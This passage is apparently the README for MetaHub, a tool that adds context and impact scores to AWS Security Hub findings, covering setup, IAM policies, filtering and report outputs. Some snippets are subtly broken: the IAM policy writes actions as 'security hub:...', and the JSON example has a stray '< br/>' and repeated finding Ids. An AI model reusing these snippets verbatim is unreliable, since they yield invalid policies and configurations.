MetaHub can also filter, deduplicate, group, report, suppress, or update your security findings in automated workflows. It is designed for use as a CLI tool or within automated workflows, such as AWS Security Hub custom actions or AWS Lambda functions.
The following is the JSON output for an EC2 instance; see how MetaHub organizes all the information about its context together under associations, config, tags, account, cloudtrail, and impact.
Context
In MetaHub, context refers to information about the affected resources like their configuration, associations, logs, tags, account, and more.
MetaHub doesn't stop at the affected resource but analyzes any associated or attached resources. For instance, if there is a security finding on an EC2 instance, MetaHub will not only analyze the instance but also the security groups attached to it, including their rules. MetaHub will examine the IAM roles that the affected resource is using and the policies attached to those roles for any issues. It will analyze the EBS volumes attached to the instance and determine whether they are encrypted. It will also analyze the Auto Scaling groups that the instance is associated with and how. MetaHub will also analyze the VPC, subnets, and other resources associated with the instance.
The Context module can retrieve information from the affected resources, the affected accounts, and every associated resource. The Context module has five main parts: config (which includes associations as well), tags, cloudtrail, and account. By default, config and tags are enabled, but you can change this behavior using the option --context (to enable all the context modules you can use --context config tags cloudtrail account). The output of each enabled key will be added under the affected resource.
Config
Under the config key, you can find anything related to the configuration of the affected resource. For example, if the affected resource is an EC2 instance, you will see keys like private_ip, public_ip, or instance_profile.
You can filter your findings based on Config outputs using the option --mh-filters-config <key> {True/False}. See Config Filtering.
Associations
Under the associations key, you will find all the associated resources of the affected resource. For example, if the affected resource is an EC2 instance, you will find resources like Security Groups, IAM roles, volumes, VPC, subnets, Auto Scaling groups, etc. Each time MetaHub finds an association, it will connect to the associated resource again and fetch its own context.
Associations are key to understanding the context and impact of your security findings, such as their exposure.
You can filter your findings based on Associations outputs using the option --mh-filters-config <key> {True/False}. See Config Filtering.
Tags
MetaHub relies on AWS Resource Groups Tagging API to query the tags associated with your resources.
Note that not all AWS resource types support this API. You can check the supported services.
Tags are a crucial part of understanding your context. Tagging strategies often include:
- Environment (like Production, Staging, Development, etc.)
- Data classification (like Confidential, Restricted, etc.)
- Owner (like a team, a squad, a business unit, etc.)
- Compliance (like PCI, SOX, etc.)
If you follow a proper tagging strategy, you can filter and generate interesting outputs. For example, you could list all findings related to a specific team and provide that data directly to that team.
You can filter your findings based on Tags outputs using the option --mh-filters-tags TAG=VALUE. See Tags Filtering.
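For reference, the kind of query involved can be reproduced with boto3 against the Resource Groups Tagging API. This is a simplified illustration, not MetaHub's actual code, and the ARN is a placeholder.

# Sketch: fetch the tags of a resource via the Resource Groups Tagging API.
import boto3

client = boto3.client("resourcegroupstaggingapi")
response = client.get_resources(
    ResourceARNList=["arn:aws:ec2:eu-west-1:111122223333:security-group/sg-0123456789"]  # placeholder ARN
)
for mapping in response["ResourceTagMappingList"]:
    tags = {tag["Key"]: tag["Value"] for tag in mapping["Tags"]}
    print(mapping["ResourceARN"], tags)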
CloudTrail
Under the cloudtrail key, you will find critical CloudTrail events related to the affected resource, such as creation events.
The Cloudtrail events that we look for are defined by resource type, and you can add, remove or change them by editing the configuration file resources.py.
For example, for an affected resource of type Security Group, MetaHub will look for the following events:
- CreateSecurityGroup: Security Group creation event
- AuthorizeSecurityGroupIngress: Security Group rule authorization event
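As an illustration of the shape such definitions can take (the actual content of resources.py may differ), a per-resource-type mapping could look like this:

# Hypothetical sketch of a resource-type -> CloudTrail events mapping;
# the real definitions live in lib/config/resources.py.
WATCHED_EVENTS = {
    "AwsEc2SecurityGroup": [
        "CreateSecurityGroup",            # Security Group creation event
        "AuthorizeSecurityGroupIngress",  # Security Group rule authorization event
    ],
}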
Account
Under the account key, you will find information about the account where the affected resource is running, such as whether it is part of an AWS Organization, information about its contacts, etc.
Ownership
MetaHub also focuses on ownership detection. It can determine the owner of the affected resource in various ways. This information can be used to automatically assign a security finding to the correct owner, escalate it, or make decisions based on this information.
An automated way to determine the owner of a resource is critical for security teams. It allows them to focus on the most critical issues and escalate them to the right people in automated workflows. But automating workflows this way is only viable if you have a reliable way to define the impact of a finding, which is why MetaHub also focuses on impact.
Impact
The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.
The following are the impact criteria that MetaHub evaluates by default:
Exposure
Exposure evaluates how the affected resource is exposed to other networks. For example, whether the resource is public, whether it is part of a VPC, whether it has a public IP, and whether it is protected by a firewall or a security group.
Possible Statuses | Value | Description |
---|---|---|
effectively-public | 100% | The resource is effectively public from the Internet. |
restricted-public | 40% | The resource is public, but there is a restriction like a Security Group. |
unrestricted-private | 30% | The resource is private but unrestricted, like an open security group. |
launch-public | 10% | These are resources that can launch other resources as public. For example, an Auto Scaling group or a Subnet. |
restricted | 0% | The resource is restricted. |
unknown | - | The resource couldn't be checked |
Access
Access evaluates the resource policy layer. MetaHub checks every available policy, including IAM managed policies, IAM inline policies, resource policies, bucket ACLs, and any association to other resources like IAM roles, whose policies are also analyzed. An unrestricted policy is not only an issue for that policy itself; it affects any other resource which is using it.
Possible Statuses | Value | Description |
---|---|---|
unrestricted | 100% | The principal is unrestricted, without any condition or restriction. |
untrusted-principal | 70% | The principal is an AWS Account, not part of your trusted accounts. |
unrestricted-principal | 40% | The principal is not restricted, defined with a wildcard. There could be conditions restricting it, or other restrictions like S3 public access blocks. |
cross-account-principal | 30% | The principal is from another AWS account. |
unrestricted-actions | 30% | The actions are defined using wildcards. |
dangerous-actions | 30% | Some dangerous actions are defined as part of this policy. |
unrestricted-service | 10% | The policy allows an AWS service as principal without restriction. |
restricted | 0% | The policy is restricted. |
unknown | - | The policy couldn't be checked. |
Encryption
Encryption evaluates the different encryption layers based on each resource type. For example, for some resources it evaluates whether both the at_rest and in_transit encryption configurations are enabled.
Possible Statuses | Value | Description |
---|---|---|
unencrypted | 100% | The resource is not fully encrypted. |
encrypted | 0% | The resource is fully encrypted, including any of its associations. |
unknown | - | The resource encryption couldn't be checked. |
Status
Status evaluates the status of the affected resource in terms of attachment or functioning. For example, for an EC2 instance we evaluate whether the resource is running, stopped, or terminated, while for resources like EBS volumes and Security Groups, we evaluate whether those resources are attached to any other resource.
Possible Statuses | Value | Description |
---|---|---|
attached | 100% | The resource supports attachment and is attached. |
running | 100% | The resource supports running and is running. |
enabled | 100% | The resource supports enabled and is enabled. |
not-attached | 0% | The resource supports attachment, and it is not attached. |
not-running | 0% | The resource supports running and it is not running. |
not-enabled | 0% | The resource supports enabled and it is not enabled. |
unknown | - | The resource couldn't be checked for status. |
Environment
Environment evaluates the environment where the affected resource is running. By default, MetaHub defines 3 environments: production, staging, and development, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account ID, or the account alias. You can define your own environment definitions and strategy in the configuration file (see Customizing Configuration).
Possible Statuses | Value | Description |
---|---|---|
production | 100% | It is a production resource. |
staging | 30% | It is a staging resource. |
development | 0% | It is a development resource. |
unknown | - | The resource couldn't be checked for environment. |
Application
Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the tag awsApplication, but you can extend this functionality based on your context, for example by defining other tags you use for defining applications or services (like Service or any other), or by relying on the account ID or alias. You can define your application definitions and strategy in the configuration file (see Customizing Configuration).
Possible Statuses | Value | Description |
---|---|---|
unknown | - | The resource couldn't be checked for application. |
Findings Scoring
As part of the impact score calculation, we also evaluate the total amount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:
(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)
For example, if the affected resource has two findings affecting it, one with HIGH and another with LOW severity, the Impact Findings Score will be:
SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875
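A small sketch of that calculation (the helper name is ours, and the MEDIUM weight is an assumption; the HIGH, LOW, and CRITICAL weights come from the example above):

# Sketch of the findings score metric described above.
SEVERITY_WEIGHTS = {"CRITICAL": 4, "HIGH": 3, "MEDIUM": 1, "LOW": 0.5}  # MEDIUM weight assumed

def findings_score(severities, highest="CRITICAL"):
    total = sum(SEVERITY_WEIGHTS[s] / SEVERITY_WEIGHTS[highest] for s in severities)
    return min(total, 1)  # capped at 1, as the formula states

print(findings_score(["HIGH", "LOW"]))  # 0.875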
Architecture
MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates the impact. Finally, it generates different outputs based on your needs.
Use Cases
Some use cases for MetaHub include:
- MetaHub integration with Prowler as a local scanner for context enrichment
- Automating Security Hub findings suppression based on Tagging
- Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
- Create enriched HTML reports for your findings that you can filter, sort, group, and download
- Create Security Hub Insights based on MetaHub context
Features
MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation
MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:
- Config: Fetches the most important configuration values from the affected resource.
- Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
- Tags: Queries tagging from affected resources
- CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events
- Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.
MetaHub supports filters on top of these context outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production) and combine this with filters based on Config or Associations: for example, whether the resource is public, whether it is encrypted, whether it is part of a VPC, whether it is using a specific IAM role, and more. For more information, refer to Config filters and Tags filters.
But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters, but in addition, you can save and re-use your filters as YAML files using the option --sh-template.
If you prefer, you can enrich your findings back directly in AWS Security Hub using the option --enrich-findings. This action will update your AWS Security Hub findings using the field UserDefinedFields. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.
When investigating findings, you may need to update many security findings at once. MetaHub also allows you to execute bulk updates to AWS Security Hub findings, such as changing the Workflow Status, using the option --update-findings. As an example, suppose you identified hundreds of security findings about public resources, but based on the MetaHub context you know those resources are not effectively public, as they are protected by routing and firewalls. You can update all the findings for the output of your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note of your findings with a custom text for future reference.
MetaHub supports different output modes, some of them JSON-based, like json-inventory, json-statistics, json-short and json-full, but also powerful HTML, XLSX and CSV outputs. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources that adds the tags Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.
MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master account and your child/service accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live, based on your needs. Refer to Configuring Security Hub for more information.
Customizing Configuration
MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.
Things you can customize:
- lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.
- lib/config/impact.py: This file contains the values and their weights for the impact formula criteria. You can modify the values and the weights based on your needs.
- lib/config/resources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.
Run with Python
MetaHub is a Python3 program. You need to have Python3 installed on your system along with the required Python modules described in the file requirements.txt.
Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).
Run it using Python Virtual Environment
- Clone the repository:
git clone [email protected]:gabrielsoltz/metahub.git
- Change to the repository dir:
cd metahub
- Create a virtual environment for this project:
python3 -m venv venv/metahub
- Activate the virtual environment you just created:
source venv/metahub/bin/activate
- Install Metahub requirements:
pip3 install -r requirements.txt
- Run:
./metahub -h
- Deactivate your virtual environment after you finish with:
deactivate
Next time, you only need steps 4 and 6 to use the program.
Alternatively, you can run this tool using Docker.
Run with Docker
MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.
The available tags for MetaHub containers are the following:
- latest: in sync with the master branch
- <x.y.z>: you can find the releases here
- stable: this tag always points to the latest release
For running from the public registry, you can run the following command:
docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h
AWS credentials and Docker
If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.
For instance, you can run the following command:
docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h
On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.
Build and Run Docker locally
Or you can also build it locally:
git clone [email protected]:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h
Run with Lambda
MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.
Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.
Terraform code is provided for deploying the Lambda function and all its dependencies.
Lambda use-cases
- Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
- Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
- Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
- Trigger the MetaHub Lambda function to create a ticket with enriched context.
Deploying Lambda
The Terraform code for deploying the Lambda function is provided under the terraform/ folder.
Just run the following commands:
cd terraform
terraform init
terraform apply
The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.
Customize Lambda behaviour
You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.
Lambda Permissions
Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (you will need this, for example, if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume by adding the option --mh-assume-role in the Lambda function configuration (see the previous step) and adding the corresponding policy to allow the Lambda to assume that role to the Lambda role.
Run with Security Hub Custom Action
MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.
The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings, which means that it will update your findings back with MetaHub outputs. If you want to change this, see Customize Lambda behaviour.
You need first to create the Lambda function and then create the custom action in Security Hub.
For creating the lambda function, follow the instructions in the Run with Lambda section.
For creating the AWS Security Hub custom action:
- In Security Hub, choose Settings and then choose Custom Actions.
- Choose Create custom action.
- Provide a Name, Description, and Custom action ID for the action.
- Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
- In EventBridge, choose Rules and then choose Create rule.
- Enter a name and description for the rule.
- For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
- For Rule type, choose a rule with an event pattern and then press Next.
- For Event source, choose AWS events.
- For the Creation method, choose Use pattern form.
- For Event source, choose AWS services.
- For AWS service, choose Security Hub.
- For Event type, choose Security Hub Findings - Custom Action.
- Choose Specific custom action ARNs and add a custom action ARN.
- Choose Next.
- Under Select targets, choose the Lambda function
- Select the Lambda function you created for MetaHub.
AWS Authentication
- Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).
For example, you can use the aws configure option.
aws configure
Or you can export your credentials to the environment.
export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID="ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY="XXXXXXXXX"
export AWS_SESSION_TOKEN="XXXXXXXXX"
Configuring Security Hub
- If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in to. Just use the option --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.
- --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.
- --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS account than the one where AWS Security Hub is running, or when running AWS Security Hub in a multiple-account setup. Both options must be used together. The role provided needs enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify --sh-account, MetaHub will use the account you are logged in to.
- --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role, as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.
IAM Policy for Security Hub
This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"security hub:GetFindings",
"security hub:ListFindingAggregators",
"security hub:BatchUpdateFindings",
"iam:ListAccountAliases"
],
"Resource": [
"*"
]
}
]
}
Configuring Context
If you are running MetaHub for a multiple AWS account setup (AWS Security Hub is aggregating findings from multiple AWS accounts), you must provide the role to assume for Context queries, because the affected resources are not in the same AWS account as the AWS Security Hub findings. The --mh-assume-role option will be used to connect with the affected resources directly in the affected account. This role needs enough policies to be able to describe resources.
IAM Policy for Context
The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit
and the following actions:
tag:GetResources
lambda:GetFunction
lambda:GetFunctionUrlConfig
cloudtrail:LookupEvents
account:GetAlternateContact
organizations:DescribeAccount
iam:ListAccountAliases
Examples
Inputs
MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.
If you want to read from an input ASFF file, you need to use the options:
./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff
You can also combine AWS Security Hub findings with input ASFF files by specifying both inputs:
./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff
When using a file as input, you can't use the option --sh-filters for filtering findings, as this option relies on the AWS API for filtering. You also can't use the options --update-findings or --enrich-findings, as those findings are not in AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.
Output Modes
MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.
The outputs will be saved in the outputs/ folder with the execution date.
If you want to generate only a specific output mode, you can use the option --output-modes with the desired output mode.
For example, if you only want to generate the output json-short, you can use:
./metahub.py --output-modes json-short
If you want to generate json-short, json-full and html outputs, you can use:
./metahub.py --output-modes json-short json-full html
JSON
JSON-Short
Show all findings titles together under each affected resource, along with the AwsAccountId, Region, and ResourceType:
JSON-Full
Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn:
JSON-Inventory
Show a list of all resources with their ARN.
JSON-Statistics
Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.
HTML
You can create rich HTML reports of your findings, adding your context as part of them.
HTML Reports are interactive in many ways:
- You can add/remove columns.
- You can sort and filter by any column.
- You can auto-filter by any column
- You can group/ungroup findings
- You can also download that data to xlsx, CSV, HTML, and JSON.
CSV
You can create CSV reports of your findings, adding your context as part of them.
XLSX
Similar to CSV but with more formatting options.
Customize HTML, CSV or XLSX outputs
You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (see Customizing Configuration).
For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using:
./metahub --output-modes html --output-tag-columns Owner Environment
Filters
You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.
Security Hub Filtering
MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE using the option --sh-filters, the same way you would filter using the AWS CLI, but limited to the EQUALS comparison. If you want another comparison, use the option --sh-template (see Security Hub Filtering using YAML templates).
You can check available filters in AWS Documentation
./metahub --sh-filters <KEY=VALUE>
If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW
Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
If a value contains spaces, you should specify it using double quotes: ProductName="Security Hub"
You can add as many different filters as you need to your query, and also add the same filter key with different values:
Examples:
- Filter by Severity (CRITICAL):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
- Filter by Severity (CRITICAL and HIGH):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
- Filter by Severity and AWS Account:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
- Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
- Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
- Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
- Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:securityhub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
- Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED
Security Hub Filtering using YAML templates
MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub, like 'EQUALS', 'PREFIX', 'NOT_EQUALS' or 'PREFIX_NOT_EQUALS'. You can call your YAML file using the option --sh-template <FILE>.
You can find examples under the folder templates.
- Filter using the YAML template default.yml:
./metahub --sh-template templates/default.yml
Config Filters
MetaHub supports Config filters (and Associations) in the form of KEY=VALUE, where the value can only be True or False, using the option --mh-filters-config. You can use as many filters as you want, separated by spaces. If you specify more than one filter, you will get all resources that match all filters.
Config filters only support True or False values:
- A Config filter set to True means True or with data.
- A Config filter set to False means False or without data.
Config filters run after AWS Security Hub filters:
- MetaHub fetches AWS Security Hub findings based on the filters you specified using --sh-filters (or the default ones).
- MetaHub executes Context for the affected AWS resources based on the previous list of findings.
- MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.
Examples:
- Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW), only if they are associated to network interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
- Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=True
Tags Filters
MetaHub supports Tags filters in the form of KEY=VALUE, where KEY is the tag name and VALUE is the tag value. You can use as many filters as you want, separated by spaces. Specifying multiple filters will give you all resources that match at least one filter.
Tags filters run after AWS Security Hub filters:
- MetaHub fetches AWS Security Hub findings based on the filters you specified using --sh-filters (or the default ones).
- MetaHub executes Tags for the affected AWS resources based on the previous list of findings.
- MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.
Examples:
- Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW), only if they are tagged with the tag Environment and the value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production
Updating Workflow Status
You can use MetaHub to update your AWS Security Hub findings' workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) with a single command. You will use the --update-findings option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. The AWS Security Hub API is limited to 100 findings per update, so MetaHub will split your results into chunks of 100 items to avoid this limitation and update your findings regardless of the amount.
For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW, I found two affected resources with three findings each, making six Security Hub findings in total.
Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:
./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."
The --update-findings option will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.
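For reference, the chunking described above maps to the Security Hub BatchUpdateFindings API, roughly as in the boto3 sketch below. This is a simplified illustration, not MetaHub's actual implementation.

# Sketch: update workflow status in chunks of 100, the BatchUpdateFindings limit.
import boto3

def update_workflow(findings, status, note_text):
    securityhub = boto3.client("securityhub")
    for i in range(0, len(findings), 100):  # split into chunks of 100 findings
        chunk = findings[i:i + 100]
        securityhub.batch_update_findings(
            FindingIdentifiers=[{"Id": f["Id"], "ProductArn": f["ProductArn"]} for f in chunk],
            Workflow={"Status": status},
            Note={"Text": note_text, "UpdatedBy": "metahub"},  # UpdatedBy value is illustrative
        )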
Enriching Findings
You can use MetaHub to enrich your AWS Security Hub findings back with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.
By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.
For example, suppose you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public (public=True) with Context outputs:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-config public=True --enrich-findings
The --enrich-findings option will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.
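Enrichment uses the same BatchUpdateFindings API, writing the context into UserDefinedFields. Again a simplified sketch; the identifiers and context keys shown are illustrative.

# Sketch: enrich one finding back in Security Hub via UserDefinedFields.
import boto3

finding_id = "arn:aws:securityhub:eu-west-1:111122223333:subscription/example/finding/example"  # placeholder
product_arn = "arn:aws:securityhub:eu-west-1::product/aws/securityhub"

securityhub = boto3.client("securityhub")
securityhub.batch_update_findings(
    FindingIdentifiers=[{"Id": finding_id, "ProductArn": product_arn}],
    UserDefinedFields={"exposure": "effectively-public", "environment": "production"},  # example context keys
)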
Findings Aggregation
Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.
Shadowing is when two checks refer to the same issue, but one in a more generic way than the other one.
Duplication is when you use more than one scanner and get the same finding more than once.
Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.
If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices,
you will get two findings for the same issue:
EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
EC2.19 Security groups should not allow unrestricted access to ports with high risk
If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:
4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389
Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!
EC2.22 Unused EC2 security groups should be removed
So now you have in your dashboard four findings for one resource!
Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.
MetaHub aggregates security findings under the affected resource.
This is how MetaHub shows the previous example with output-mode json-short:
"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}
This is how MetaHub shows the previous example with output-mode json-full:
"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
